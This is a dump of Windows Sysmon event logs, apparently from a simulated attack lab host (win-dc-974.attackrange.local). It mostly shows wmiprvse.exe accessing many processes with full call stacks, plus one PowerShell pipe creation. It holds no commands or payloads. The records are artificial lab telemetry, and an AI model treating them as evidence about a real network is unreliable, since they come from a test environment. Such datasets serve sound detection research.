16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.073{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.072{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.072{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.071{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.071{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.070{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.069{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.069{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.068{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.067{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.066{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.066{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.065{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.064{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68124D5CC56BFE2DF558861D971D3284,SHA256=1746072207308ED8D6BB84416FAA37EB18811949D678A17820BED094E8C7170D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.064{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002242687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:43.063{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248\PSHost.132591776829085603.15248.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002242686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 